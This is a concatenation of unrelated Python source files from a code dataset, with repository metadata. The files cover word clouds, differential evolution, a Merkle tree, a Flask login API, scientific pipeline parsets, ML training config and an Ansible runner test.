| 2022-03-09T06:26:26.975792 | 2019-11-01T17:00:17 | 2019-11-01T17:00:17 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,109 |
py
|
# -*- coding: utf-8 -*-
# @Author : Keginx
from collections import Counter
from wordcloud import WordCloud, ImageColorGenerator
import jieba
import matplotlib.image as mpimg
import matplotlib.pyplot as plt
import pandas as pd
def generate_wordcloud(stopwords):
    # draw the word cloud
comment_data = pd.read_csv('resources/drop_duplicates_data.csv', encoding="GBK", dtype={'score': float})
grouped = comment_data.groupby(['city'])
grouped_pct = grouped['score']
comments_str = ' '.join(comment_data['comment'])
words_list = []
word_generator = jieba.cut_for_search(comments_str)
for word in word_generator:
words_list.append(word)
words_list = [k for k in words_list if len(k) > 1]
    back_color = mpimg.imread('resources/image.jpg')  # read the mask image
    wc = WordCloud(background_color='white',  # background color
                   max_words=1000,  # maximum number of words
                   mask=back_color,  # draw the cloud inside this mask; when it is set, width and height are ignored
                   max_font_size=70,  # maximum font size
                   font_path="resources/STKAITI.TTF",  # CJK-capable font to avoid garbled glyphs; swap in another font from C:/Windows/Fonts/ if needed
                   random_state=42,  # returns one PIL color per word
                   stopwords=stopwords,
                   # width=1000,  # image width
                   # height=860  # image height
                   )
word_count = Counter(words_list)
# 删除字典里面的回车换行,避免Pillow的bug
# size, offset = self.font.getsize(text, direction, features)
# https://github.com/python-pillow/Pillow/issues/2614
del (word_count['\r\n'])
print(word_count)
# plt.imshow(back_color)
wc.generate_from_frequencies(word_count)
    # generate word colors from the colored mask image
image_colors = ImageColorGenerator(back_color)
# plt.imshow(wc)
    # plot the result
plt.axis('off')
plt.figure()
plt.imshow(wc.recolor(color_func=image_colors))
plt.axis('off')
plt.show()
wc.to_file('resources/word_cloud.jpg')
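# Illustrative usage sketch (not part of the original module): the stopword set
# below is made up, and the resource paths hard-coded inside generate_wordcloud()
# are assumed to exist as in the original project layout.
if __name__ == '__main__':
    demo_stopwords = {'the', 'and', 'of'}  # hypothetical stopwords
    generate_wordcloud(demo_stopwords)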
|
[
"[email protected]"
] | |
f8abe5ecf1cad5f4ae9a99be711931aa542fc6df
|
5774101105b47d78adb7a57eefdfa21502bbd70c
|
/python 之路/section5_反射_3/lib/manager.py
|
d31ae9adb3736efb7cdcb985aca4793d4a5f05a4
|
[] |
no_license
|
zhlthunder/python-study
|
34d928f0ebbdcd5543ae0f41baaea955c92f5c56
|
0f25dd5105ba46791842d66babbe4c3a64819ee5
|
refs/heads/master
| 2023-01-12T18:39:47.184978 | 2018-10-07T23:48:04 | 2018-10-07T23:48:04 | 90,516,611 | 0 | 1 | null | 2022-12-26T19:46:22 | 2017-05-07T07:39:48 |
HTML
|
UTF-8
|
Python
| false | false | 106 |
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#author:zhl
def order():
print("炫酷的订单页面")
|
[
"[email protected]"
] | |
f9acc6c1b378818ba70ee0481bb30fc5b6cb89e4
|
65d27e728627965168de68d80ad824a3731fb68e
|
/evolutionary.py
|
e930dcb532a2fe64b8cbd96254453c5b25952d63
|
[] |
no_license
|
Manolomon/differential-evolution
|
e2916c0f1e76d9e28186e12af20e2f4a181f605c
|
b40f21254db3d16406482e35b594b5cdc00c0445
|
refs/heads/master
| 2022-07-23T13:32:47.039345 | 2020-01-14T04:01:37 | 2020-01-14T04:01:37 | 233,727,687 | 0 | 0 | null | 2022-06-22T00:08:55 | 2020-01-14T01:11:22 |
Jupyter Notebook
|
UTF-8
|
Python
| false | false | 2,175 |
py
|
import numpy
import random
import pandas as pd
def aptitud(individuo):
return (individuo[0]**2) + (individuo[1]**2)
def ed_rand_1_bin(np, max_gen, f, cr, execution):
EVOLUTION = pd.DataFrame()
    g = 0  # generation counter
    population = numpy.random.uniform(low=-5, high=5, size=(np,2))  # create a random initial population
print(population)
print("---------------")
    aptitudes = numpy.apply_along_axis(aptitud, 1, population)  # evaluate the population
order = numpy.argsort(aptitudes)
population = population[order]
for g in range(max_gen):
for i in range (np):
            # Mutation
            no_parent = numpy.delete(population, i, 0)
            row_i = numpy.random.choice(no_parent.shape[0], 3, replace=False)  # pick donors different from the parent, r1 != r2 != r3
            r = no_parent[row_i, :]
            v_mutacion = ((r[0]-r[1]) * f) + r[2]  # mutation vector v
            # Recombination
            jrand = random.randint(0, 1)  # position where parent and offspring are forced to differ
v_hijo = numpy.empty([1, 2])
for j in range(2):
t = random.uniform(0, 1)
if t < cr or j is jrand:
v_hijo[0,j] = v_mutacion[jrand]
else:
v_hijo[0,j] = population[i,j]
population = numpy.concatenate((population, v_hijo), axis=0)
        # Replacement by fitness
        aptitudes = numpy.apply_along_axis(aptitud, 1, population)  # evaluate the population
order = numpy.argsort(aptitudes)
population = population[order]
        # discard the extra individuals from the population
population = population[:np]
aptitudes = aptitudes[:np]
generation = pd.DataFrame({'x1': population[:, 0], 'x2': population[:, 1], 'f(x1,x2)': aptitudes})
generation['gen'] = g + 1
EVOLUTION = pd.concat([EVOLUTION, generation], ignore_index=True)
EVOLUTION.to_csv('./datasources/execution_' + str(execution + 1) + '.csv')
if __name__ == "__main__":
for i in range (30):
ed_rand_1_bin(np=50, max_gen=50, f=0.7, cr=0.0001, execution=i)
|
[
"[email protected]"
] | |
e63f17e2d553fe393a27ce15b7df51ab1d7c07be
|
783a23e160c26931dddce2415b0af1ecf71783af
|
/Crypto/unused/MerkleTree1.py
|
df4c9ded334e556aad14cb0e5a2f8a07cb9974fc
|
[] |
no_license
|
vaibspider/bitcoin
|
c89b108f60b8eedd4ca7bd4356f9d08f9ebd5140
|
f88c78cf52ecf0f588b2a90031a9d799d3a53f82
|
refs/heads/master
| 2022-12-08T17:13:15.310266 | 2020-08-14T16:45:42 | 2020-08-14T16:45:42 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,265 |
py
|
from Crypto.Hash import SHA256
from collections import OrderedDict
from typing import List
class MerkleTree:
    def __init__(self, txnList: List[str]) -> None:
self.listOfTxns: List[str] = txnList
self.mrkl_root: str = ""
def getHashValue(self,left: str, right: str) -> str:
newHash = SHA256.new()
newData: str = left+right
newHash.update(newData.encode('utf-8'))
return newHash.hexdigest()
def get_new_list(self, tempList: List[str]) -> List[str]:
newList: List[str] = []
index: int = 0
while(index<len(tempList)):
left:str = tempList[index]
index+=1
right:str = ""
if index!=len(tempList):
right = tempList[index]
newList.append(self.getHashValue(left,right))
index+=1
return newList
def merkle_tree(self):
tempList: List[str] = self.listOfTxns
newList: List[str] = self.get_new_list(tempList)
while(len(newList)!=1):
newList = self.get_new_list(newList)
self.mrkl_root = newList[0]
def getRoot(self) -> str:
return self.mrkl_root
temp = MerkleTree(['a','e','c','d'])
temp.merkle_tree()
print(temp.mrkl_root)
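# Illustrative check (not part of the original script): reproduces the root for
# ['a', 'e', 'c', 'd'] by hand, using the same pairing and hashing scheme as the
# class above. Defined but never called, so the script's output is unchanged.
def _verify_root_by_hand() -> bool:
    left = SHA256.new('ae'.encode('utf-8')).hexdigest()   # hash of leaves 'a' and 'e'
    right = SHA256.new('cd'.encode('utf-8')).hexdigest()  # hash of leaves 'c' and 'd'
    root = SHA256.new((left + right).encode('utf-8')).hexdigest()
    return root == temp.getRoot()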
|
[
"[email protected]"
] | |
75cc7c8d1fba46bcee40c74f4deab8796d53a56b
|
5b37c4bd44553a0ae29d14cde773a73fd6f091ef
|
/day16.py
|
0b8a71970dd0b9bdd6a4e7b5dd0869ff6515f8c7
|
[] |
no_license
|
Curiouspaul1/30daysofcode-Dsc
|
bf38cacc76d537a4722d7a87be2d6d8657c1ffd9
|
56735671732b22645d6e0dd87884a141c6ddb90b
|
refs/heads/master
| 2022-04-26T00:52:56.590578 | 2020-04-24T12:27:42 | 2020-04-24T12:27:42 | 250,358,176 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,047 |
py
|
from flask import Flask, request, jsonify,make_response
from flask_sqlalchemy import SQLAlchemy
from sqlalchemy.exc import IntegrityError
from flask_bcrypt import Bcrypt
from flask_marshmallow import Marshmallow
from day10 import emailcheck
import os
# Database directory
basedir = os.getcwd()
app = Flask(__name__)
#app config
"""
This config clause specifies the database location. And disabes an option to
track changes in database to False (it's turned on by default). Sqlite comes
by default with flask so no need to worry
about installing any rdbms
"""
app.config['SQLALCHEMY_DATABASE_URI'] = "sqlite:///" + os.path.join(basedir,"app.sqlite") or os.getenv("DATABASE_URI")
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
db = SQLAlchemy(app)
ma = Marshmallow(app)
bcrypt = Bcrypt(app)
# Database Model
class User(db.Model):
"""
The user class represents an sql table. It's schema is outlined
below, as with the aid of an ORM (Sqlalchemy) or more precisely
flask-sqlalchemy (a wrapper built around the more generic sqlalchemy).
This allows me to write native python objects that translate to (more or less)
SQL tables.
"""
id = db.Column(db.Integer,primary_key=True,nullable=False)
username = db.Column(db.String(50),unique=True)
email = db.Column(db.String(100),unique=True) ## The unique property on email, disallows duplicate emails
password = db.Column(db.String(100))
# Signup Handler
@app.route('/signup',methods=['POST'])
def signup():
# fetch data
user_data = request.get_json()
# hash password
password_hash = bcrypt.generate_password_hash(user_data["password"])
# validate email using email checker from day10 (regex)
if emailcheck(user_data["email"]):
# checks to see if email doesn't already exists
try:
new_user = User(password=password_hash,email=user_data["email"])
db.session.add(new_user)
except IntegrityError:
return make_response("User with email already exists",406)
# checks also to see if username doesnt already exist
try:
new_user.username = user_data["username"]
db.session.commit()
except IntegrityError:
return make_response("User with username already exists",406)
else:
return make_response("Invalid Email",406)
return make_response("registration successful",200)
# Login/Auth Handler
@app.route('/login',methods=['POST'])
def login():
login_data = request.get_json()
# find user with username or email
    user = User.query.filter_by(username=login_data["username"]).first() or User.query.filter_by(email=login_data["email"]).first()
if user:
# fetch passowrd from database then compare
password_hash = user.password
if bcrypt.check_password_hash(password_hash,login_data["password"]):
return make_response("Signed in successfully", 200)
else:
return make_response("Wrong password",401)
else:
return make_response("No such user found",404)
|
[
"[email protected]"
] | |
86d71e2a0078a23f5ba88d4cf5f4ca0b1a07ee59
|
b7f78e4758374cffcc912489e40134dee4a70d26
|
/domain/providers/provider.py
|
fffe3086f34e3fe53674d3d454e0cb13f1afa008
|
[] |
no_license
|
Canu667/python-payment-gateway
|
b0fa57d15f6985975b934d6e6f3d22ac14d42166
|
d680c618ec269e1f6fdbdd4d18768b16d54ae118
|
refs/heads/master
| 2021-07-11T15:00:07.266354 | 2020-01-19T22:03:40 | 2020-01-19T22:03:40 | 228,256,666 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 959 |
py
|
from abc import ABC, abstractmethod
from models.payment_model import PaymentModel
from schemas.payment import PaymentDto
class Provider(ABC):
@abstractmethod
def create_payment(self, payment: PaymentDto):
pass
def capture(self, payment: PaymentModel):
pass
class CouldNotInitialisePayment(Exception):
def __init__(self, order_id, message):
super(CouldNotInitialisePayment, self).__init__(
"Payment {} could not be initalised: {} ".format(order_id, message))
class CouldNotCaptureOnPayment(Exception):
def __init__(self, order_id, message):
super(CouldNotCaptureOnPayment, self).__init__(
"Payment {} could not be captured: {} ".format(order_id, message))
class CouldNotActivatePayment(Exception):
def __init__(self, order_id, message):
super(CouldNotActivatePayment, self).__init__(
"Payment {} could not be activated: {} ".format(order_id, message))
|
[
"[email protected]"
] | |
87351cd3e0205ea5223f15e570548bc590e8013f
|
5ed35806523dd5587cb2dc31e55aa086dda87801
|
/datamanagement/modules/pipeline/CreateCASAImagerParsetFiles.py
|
9a9101586cfb2b6a327b4d4716debf24d9aad5d7
|
[] |
no_license
|
oscarmartinezrubi/ledama
|
97d3e188432e42f37dd0229080a8e0750acbf128
|
75fca624dfd38e58af32f23a96113b04248cc251
|
refs/heads/master
| 2020-12-31T04:16:59.640490 | 2016-09-16T12:04:12 | 2016-09-16T12:04:12 | 68,370,784 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,501 |
py
|
################################################################################
# Created by Oscar Martinez #
# [email protected] #
################################################################################
import os
from ledama import utils
from ledama import msoperations
from ledama import tasksdistributor as td
from ledama.ReferenceFile import ReferenceFile
from ledama.LModule import LModule
from ledama.LModuleOptions import LModuleOptions
EXTENSION = '.imaging.parset'
class CreateCASAImagerParsetFiles(LModule):
def __init__(self,userName = None):
# Define the options
options = LModuleOptions()
options.add('reffile', 'i', 'Input RefFile')
options.add('parset', 't', 'Input template CASAImager parset file')
options.add('oparset', 'o', 'Output CASAImager parset files folder')
options.add('oextension', 'e', 'Output files extension',helpmessage='. The produced files will be stored in a folder defined in LaunchCASAImager, but in this point you can define the common file name. The produced files have a file name as [MS name].[oextension].*', default='.img.ver0')
options.add('numprocessors', 'p', 'Simultaneous processes per node', default = 1)
options.add('numnodes', 'n', 'Simultaneous nodes', default = 64)
# the information
information = 'Create CASAImager parset files'
# Initialize the parent class
LModule.__init__(self, options, information)
# Make the parset file for the measurement set indicated in what
def function(self, identifier, what, childIndex, grandChildIndex, taskIndex):
(inputms,node,imagename,outputParsetFilePath) = what
ofile = open(outputParsetFilePath, "w")
for line in self.inParsetFileLines:
if line.count('vis'):
ofile.write('vis="/net/' + node + inputms + '"\n')
elif line.count('imagename'):
ofile.write('imagename="' + imagename + '"\n')
else:
ofile.write(line + '\n')
ofile.close()
return (inputms, outputParsetFilePath)
    # Get the CASA imager parset file name (the MS name + EXTENSION)
def getCASAImagerParsetFileName(self, absPath):
return msoperations.getMeasurementSetName(absPath) + EXTENSION
def process(self, reffile, parset, oparset, oextension, numprocessors, numnodes):
# Check if file exists
if not os.path.isfile(parset):
print 'Error: ' + parset + ' does not exists'
return
self.inParsetFileLines = (open(parset, "r")).read().split('\n')
parsetsOutPath = utils.formatPath(oparset)
os.system('mkdir -p ' + parsetsOutPath )
referenceFile = ReferenceFile(reffile)
whats = []
for i in range(len(referenceFile.absPaths)):
absPath = referenceFile.absPaths[i]
whats.append((absPath, referenceFile.nodes[i], msoperations.getMeasurementSetName(absPath) + oextension, parsetsOutPath + '/' + self.getCASAImagerParsetFileName(absPath)))
# Run it
(retValuesOk, retValuesKo) = td.distribute(referenceFile.nodes, whats, self.function, numprocessors, numnodes)
td.showKoFirst(retValuesKo)
if len(retValuesOk):
print str(len(retValuesOk)) + ' CASA imager parset files were created. Check ' + parsetsOutPath
|
[
"[email protected]"
] | |
f9f6066f5029d0b9a9d17b03d3525476857e4fb2
|
2d5d17225ddabe81f17b74589895f49e530344f8
|
/testchild.py
|
bd5664d3017ce696e7674d7c93dc078eddbccbca
|
[] |
no_license
|
Gracia958/testrepo
|
230644e4976414c67e12a508d14f832e3d73d7d9
|
db898e9748ab851b65421ae7819019cd5211b64b
|
refs/heads/master
| 2022-11-27T13:10:05.071494 | 2020-07-28T07:19:54 | 2020-07-28T07:19:54 | 282,127,528 | 0 | 0 | null | 2020-07-28T07:19:55 | 2020-07-24T05:03:38 |
Python
|
UTF-8
|
Python
| false | false | 64 |
py
|
## Add a new file in the child branch.
print ("Inside Child branch")
|
[
"[email protected]"
] | |
a083a7f709dddbd60e57d7f87fa6d2c921a93153
|
b0c391ecf351e2317ac61c257dd6bfa5b10d4015
|
/pymotifs/motifs/info.py
|
8e50f9402510548d536cf1cc88526c18a5f68479
|
[] |
no_license
|
BGSU-RNA/RNA-3D-Hub-core
|
57db94bfff9b338b3a751f545699f4117150b921
|
1982e10a56885e56d79aac69365b9ff78c0e3d92
|
refs/heads/master
| 2023-05-26T09:41:38.397152 | 2023-05-23T05:50:10 | 2023-05-23T05:50:10 | 6,049,336 | 3 | 1 | null | 2022-06-21T21:27:52 | 2012-10-02T18:26:11 |
Python
|
UTF-8
|
Python
| false | false | 1,058 |
py
|
"""Load the motif info data.
This will load the cached data to store all motifs into the DB.
"""
from pymotifs import core
from pymotifs import models as mod
from pymotifs.motifs.utils import BaseLoader
from pymotifs.motifs.release import Loader as ReleaseLoader
class Loader(BaseLoader):
dependencies = set([ReleaseLoader])
@property
def table(self):
return mod.MlMotifsInfo
def motifs(self, cached):
data = []
for entry in cached['motifs']:
data.append(self.table(
motif_id=entry['motif_id'],
ml_release_id=cached['release'],
type=cached['loop_type'],
handle=entry['name']['handle'],
version=entry['name']['version'],
comment=entry['comment'],
))
return data
def data(self, pair, **kwargs):
loop_type, release = pair
cached = self.cached(loop_type)
if not cached:
raise core.InvalidState("No cached data")
return self.motifs(cached)
|
[
"[email protected]"
] | |
82136ba6add582586d0f7de5f1aebe36c5ef8f5c
|
2e2c9cf0bf1f6218f82e7ecddbec17da49756114
|
/day1python基础/__init__.py
|
b29e98abae8a3e380d7654fbeaf3546ede374470
|
[] |
no_license
|
guoyunfei0603/py31
|
c3cc946cd9efddb58dad0b51b72402a77e9d7592
|
734a049ecd84bfddc607ef852366eb5b7d16c6cb
|
refs/heads/master
| 2023-03-02T20:50:02.052878 | 2021-02-05T06:17:24 | 2021-02-05T06:17:24 | 279,454,793 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 566 |
py
|
# -*- coding: utf-8 -*-
# @Time : 2020/6/24 10:18
# @Author : guoyunfei.0603
# @File : __init__.py.py
# s = "'abcd'"
# print(s[0:2]) #'a
# 3. Reverse the word order in a string: "hello xiao mi" becomes "mi xiao hello"
# (Hint: use string splitting, joining, and list reversal)
s = "hello xiao mi"
s1 = s.split(' ')
t = s1[::-1]  # approach 1
# print(t, type(t))  # t is a list; it still has to be joined back into a string!!
new_str = ' '.join(t)
print(new_str, type(new_str))
# s1.reverse()  # approach 2
# print(s1)
|
[
"[email protected]"
] | |
721bd1b05d530a4f48442cf012415980f573f230
|
4f3f2ae204a2c709bffde8e3ae478339f743c3e8
|
/main/migrations/0009_whitepaper_is_active.py
|
fd2ac8af2732a9a6b8528cadbb7d9911a2479ea1
|
[] |
no_license
|
Anupam124jain/ICO
|
a9d5f02d2cd1680c5a4545439238f7325c601373
|
5faf27c7e25bfc3d4fa7cfc3f8dff10583dddaad
|
refs/heads/master
| 2022-12-15T17:37:11.193927 | 2019-01-21T13:39:24 | 2019-01-21T13:39:24 | 166,819,535 | 0 | 0 | null | 2022-12-08T03:00:50 | 2019-01-21T13:33:33 |
Python
|
UTF-8
|
Python
| false | false | 389 |
py
|
# Generated by Django 2.1 on 2018-09-11 12:51
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('main', '0008_auto_20180911_1249'),
]
operations = [
migrations.AddField(
model_name='whitepaper',
name='is_active',
field=models.BooleanField(default=False),
),
]
|
[
"[email protected]"
] | |
0ed37eb51587abc34d6099dead9aa947fcb30c01
|
d20d4de2ee73a13aac79c5baeb8fc90ce3f4d02e
|
/chapter04/section10.py
|
3e85fdb8d91b8dc9693bf9ff5612a81cd3150454
|
[] |
no_license
|
wistra4/minpy
|
86e7c6b009b4ba35af12f6eeb2422ade9141d585
|
4cfe8eb669a55487a8f9bab6abe864ed2ea663ac
|
refs/heads/master
| 2023-03-13T01:29:07.644879 | 2021-03-03T08:52:20 | 2021-03-03T08:52:20 | 343,477,647 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,549 |
py
|
# 10: Python strings and Japanese text
# The bytes type
s = "あいうえお"  # define a str containing hiragana
len(s)  # check its length
bs = s.encode("shift-jis")  # convert from str to bytes
len(bs)  # check its length
print(bs)  # print() the bytes object
print(s[0])
print(bs[0])
# Convert a string to bytes
u = s.encode("euc-jp", "strict")  # encode as EUC-JP
# Convert bytes back to a string
u = bs.decode("shift-jis", "ignore")  # decode Shift-JIS bytes into a str (decode the bytes object, not the str)
# Specifying the encoding of a script file
# coding: <encoding name>
# coding=<encoding name>
# -*- coding: <encoding name> -*-
# coding: utf-8
# Detecting the encoding
print("<encoding detection>")
def guess_encoding(s):
    """
    Take a bytes object as the argument and
    naively guess its encoding.
    """
    # encodings to try, in order
    encodings = ["ascii", "utf-8", "shift-jis", "euc-jp"]
    for enc in encodings:
        try:
            s.decode(enc)  # try decoding with this encoding
        except UnicodeDecodeError:
            continue  # decoding failed, try the next encoding
        else:
            return enc
            # if no error was raised, return the encoding that succeeded
    else:
        return ""  # if no encoding succeeded, return an empty string
|
[
"[email protected]"
] | |
ab688480455f8430e70d31f40d5a7677b8fdd149
|
0008d0eaff317af3ccedf523299ae382a98a6e81
|
/experiments/Q3-pres/single-instance-learning/ST-primary_multiclass/temporal_downsample/no_augmentation/_sources/train_emmental_1e13924c460154448026d09dac861e0a.py
|
df5d0b3b5326469959c12aad8210cd7007b56851
|
[] |
no_license
|
geoffreyangus/cow-tus
|
44227d8c449a262af2b9b1c644fc41b72f511e29
|
ad0eec4a5691b43a1708a4d9f599a6d7725092dd
|
refs/heads/master
| 2020-08-04T14:35:32.531057 | 2020-06-12T19:05:36 | 2020-06-12T19:05:36 | 212,168,342 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 10,514 |
py
|
import os
import os.path as path
import logging
from functools import partial
import emmental
from emmental import Meta
from emmental.data import EmmentalDataLoader
from emmental.learner import EmmentalLearner
from emmental.model import EmmentalModel
from emmental.scorer import Scorer
from emmental.task import EmmentalTask
import torch
import torch.nn as nn
import torch.utils.data as torch_data
from torchvision import transforms
from sacred import Experiment
from sacred.observers import FileStorageObserver
from sacred.utils import apply_backspaces_and_linefeeds
from cow_tus.data.transforms import training_ingredient as transforms_ingredient
from cow_tus.data.dataloaders import get_sample_weights
from cow_tus.util.util import unpickle, ce_loss, output
from cow_tus.models.modules import zoo as modules
import cow_tus.data.datasets as all_datasets
EXPERIMENT_NAME = 'trainer'
ex = Experiment(EXPERIMENT_NAME, ingredients=[transforms_ingredient])
ex.logger = logging.getLogger(__name__)
ex.captured_out_filter = apply_backspaces_and_linefeeds
@ex.config
def config(transforms):
"""
Configuration for training harness.
"""
task_str = None
assert task_str, f'task {task_str} must have a value'
tasks = task_str.split('&')
for task in tasks:
if task not in {'primary', 'primary_multiclass', '2normal_binary'}:
raise ValueError(f'task {task} not recognized')
# tuner parameters
instance_level = True
representative_loop_sampling = False
temporal_downsample = False
spatial_downsample = False
data_augmentation = False
if instance_level:
assert not representative_loop_sampling, \
'instance_level and representative_loop_sampling are mutually exclusive'
assert not (temporal_downsample and spatial_downsample), \
'temporal_downsample and spatial_downsample are mutually exclusive'
hypothesis_conditions = ['Q3-pres']
# whether or not we are working at an exam level or loop level
if instance_level:
hypothesis_conditions.append('instance-level-learning')
else:
hypothesis_conditions.append('single-instance-learning')
# labeling schema we are using
if len(tasks) > 1:
hypothesis_conditions.append('MT-' + '&'.join(tasks))
else:
hypothesis_conditions.append('ST-' + tasks[0])
# downsampling procedure
if temporal_downsample:
hypothesis_conditions.append('temporal_downsample')
elif spatial_downsample:
hypothesis_conditions.append('spatial_downsample')
else:
hypothesis_conditions.append('full_size')
# whether or not we are using data augmentation
if data_augmentation:
hypothesis_conditions.append('data_augmentation')
else:
hypothesis_conditions.append('no_augmentation')
exp_dir = path.join('experiments', *hypothesis_conditions)
meta_config = {
'device': 0
}
logging_config = {
'evaluation_freq': 1,
'checkpointing': True,
'checkpointer_config': {
'checkpoint_runway': 10,
'checkpoint_metric': {
"primary/cow-tus-dataset/valid/accuracy": "max"
}
}
}
metrics = {}
for task in tasks:
if task in {'primary', '2normal_binary'}:
metrics[task] = ['accuracy', 'roc_auc' , 'precision', 'recall', 'f1']
elif task in {'primary_multiclass'}:
metrics[task] = ['accuracy']
dataset_class = 'InstanceDataset' if instance_level else 'GlobalDataset'
dataset_args = {
'dataset_dir': 'data/split/by-animal-number/hold-out-validation',
'labels_path': f"data/labels/{'instances' if instance_level else 'globals'}.csv"
}
if temporal_downsample: # resize 224x224, normalize, extract_instance, random_offset
tmp = transforms['preprocess_fns']
if representative_loop_sampling:
tmp = tmp + [transforms['rls_transform_fn']]
preprocess_transforms = tmp + [transforms['temporal_downsample_transform_fn']]
elif spatial_downsample: # resize 120x80, normalize, extract_instance
tmp = [transforms['spatial_downsample_transform_fn']] + transforms['preprocess_fns'][1:]
if representative_loop_sampling:
tmp = tmp + [transforms['rls_transform_fn']]
preprocess_transforms = tmp
else: # resize 224x224, normalize
preprocess_transforms = transforms['preprocess_fns']
transform_fns = {
'train': preprocess_transforms,
'valid': preprocess_transforms,
'test': preprocess_transforms
}
if data_augmentation:
transform_fns['train'] = transform_fns['train'] + transforms['augmentation_fns']
dataloader_configs = {
'train': {
'batch_size': 1,
'num_workers': 8,
'shuffle': False
},
'valid': {
'batch_size': 1,
'num_workers': 8,
'shuffle': True
}
}
sampler_configs = {
'train': {
'class_name': 'RandomSampler',
'args': {
'num_samples': 150,
'replacement': True,
}
}
}
task_to_label_dict = {task: task for task in tasks}
task_to_cardinality = {
'primary': 2,
'primary_multiclass': 4,
'2normal_binary': 2
}
encoder_class = 'I3DEncoder'
encoder_args = {
'modality': 'gray',
'weights_path': 'i3d/model_flow.pth'
}
decoder_class = "AttDecoder"
decoder_args = {
'dropout_p': 0.0
}
learner_config = {
'n_epochs': 30,
'valid_split': 'valid',
'optimizer_config': {'optimizer': 'adam', 'lr': 0.01, 'l2': 0.000},
'lr_scheduler_config': {
'warmup_steps': None,
'warmup_unit': 'batch',
'lr_scheduler': 'step',
'step_config': {
'step_size': 6,
'gamma': 0.5
}
},
}
class TrainingHarness(object):
def __init__(self):
"""
"""
self._init_meta()
self.datasets = self._init_datasets()
self.dataloaders = self._init_dataloaders()
self.model = self._init_model()
@ex.capture
def _init_meta(self, _seed, exp_dir, meta_config, learner_config, logging_config):
emmental.init(path.join(exp_dir, '_emmental_logs'))
Meta.update_config(
config={
'meta_config': {**meta_config, 'seed': _seed},
'model_config': {'device': meta_config['device']},
'learner_config': learner_config,
'logging_config': logging_config
}
)
@ex.capture
def _init_datasets(self, _log, dataset_class, dataset_args, transform_fns):
datasets = {}
for split in ['train', 'valid']:
datasets[split] = getattr(all_datasets, dataset_class)(
split_str=split,
transform_fns=transform_fns[split],
**dataset_args
)
_log.info(f'Loaded {split} split.')
return datasets
@ex.capture
def _init_dataloaders(self, _log, dataloader_configs, sampler_configs, task_to_label_dict):
dataloaders = []
for split in ['train', 'valid']:
dataloader_config = dataloader_configs[split]
if split == 'train':
sampler_class = sampler_configs[split]['class_name']
sampler_args = sampler_configs[split]['args']
if sampler_class == 'WeightedRandomSampler':
weights = get_sample_weights(self.datasets[split], sampler_args['weight_task'], sampler_args['class_probs'])
sampler = getattr(torch_data, sampler_class)(
weights=weights, num_samples=sampler_args['num_samples'], replacement=sampler_args['replacement'])
else:
sampler = getattr(torch_data, sampler_class)(
data_source=self.datasets[split], **sampler_args)
dataloader_config = {
'sampler': sampler,
**dataloader_config
}
dl = EmmentalDataLoader(
task_to_label_dict=task_to_label_dict,
dataset=self.datasets[split],
split=split,
**dataloader_config,
)
dataloaders.append(dl)
_log.info(f'Built dataloader for {split} set.')
return dataloaders
@ex.capture
def _init_model(self, encoder_class, encoder_args, decoder_class, decoder_args, task_to_label_dict, metrics):
encoder_module = getattr(modules, encoder_class)(**encoder_args)
tasks = [
EmmentalTask(
name=task_name,
module_pool=nn.ModuleDict(
{
f'encoder_module': encoder_module,
f'decoder_module_{task_name}': getattr(modules, decoder_class)(task_to_cardinality[task_name], **decoder_args),
}
),
task_flow=[
{
'name': 'encoder_module', 'module': 'encoder_module', 'inputs': [('_input_', 'exam')]
},
{
'name': f'decoder_module_{task_name}',
'module': f'decoder_module_{task_name}',
'inputs': [('encoder_module', 0)],
},
],
loss_func=partial(ce_loss, task_name),
output_func=partial(output, task_name),
scorer=Scorer(metrics=metrics[task_name]),
)
for task_name in task_to_label_dict.keys()
]
model = EmmentalModel(name='cow-tus-model', tasks=tasks)
return model
def run(self):
learner = EmmentalLearner()
learner.learn(self.model, self.dataloaders)
@ex.config_hook
def hook(config, command_name, logger):
if config['exp_dir'] == None:
raise Exception(f'exp_dir is {config["exp_dir"]}')
ex.observers.append(FileStorageObserver(config['exp_dir']))
@ex.main
def main():
trainer = TrainingHarness()
res = trainer.run()
return res
if __name__ == '__main__':
ex.run_commandline()
|
[
"[email protected]"
] | |
ba2bb89073ea49c7a089f39e13f410021fb648ce
|
f94651173636a51180e68adaebe05e4b20d60fdd
|
/utils/ansible2/test_runner.py
|
8496fd596f332708fc01f81a932ae3a048d37a11
|
[] |
no_license
|
wangtangkun/devops
|
5082a0e04fcd6796b2b9474da528c9643b16d0b0
|
979db139a4841b3dc1fafa17ad805b04ef69c8f3
|
refs/heads/master
| 2020-09-12T18:27:19.024758 | 2019-11-18T18:02:55 | 2019-11-18T18:02:55 | 222,510,592 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,506 |
py
|
# coding: utf-8
from utils.ansible2.runner import AdHocRunner, CommandRunner, PlayBookRunner
from utils.ansible2.inventory import Inventory
def TestAdHocRunner():
"""
以yml的形式 执行多个命令
:return:
"""
host_data = [
{
"hostname": "192.168.179.135",
"ip": "192.168.179.135",
"port": 22
},
    ]  # host list
    inventory = Inventory(host_data)  # dynamically generate the host configuration
runner = AdHocRunner(inventory)
# dest = "/opt/mysql/world.sh"
tasks = [
# {"action": {"module": "ping"}, "name": "run_whoami"},
{"action": {"module": "replace", "args": 'path=/tmp/a.txt regexp="^(ac.*)" replace="#\\1"'},
"name": "down nginx"}
# {"action": {"module": "shell", "args": "free -m | awk 'NR\=\=2{printf \"%.2f\", $3*100/$2 }'"}, "name": "get_mem_usage"},
# {"action": {"module": "shell", "args": "df -h | awk '$NF\=\=\"/\"{printf \"%s\", $5}'"}, "name": "get_disk_usage"},
# {"action": {"module": "copy", "args": "src=/home/python/Desktop/3358.cnf dest=/opt/mysql/my3358.cnf mode=0777"}, "name": "send_file"},
# {"action": {"module": "copy", "args": "src=/home/python/Desktop/deploy.sh dest=/opt/mysql/deploy.sh mode=0777"}, "name": "send_file"},
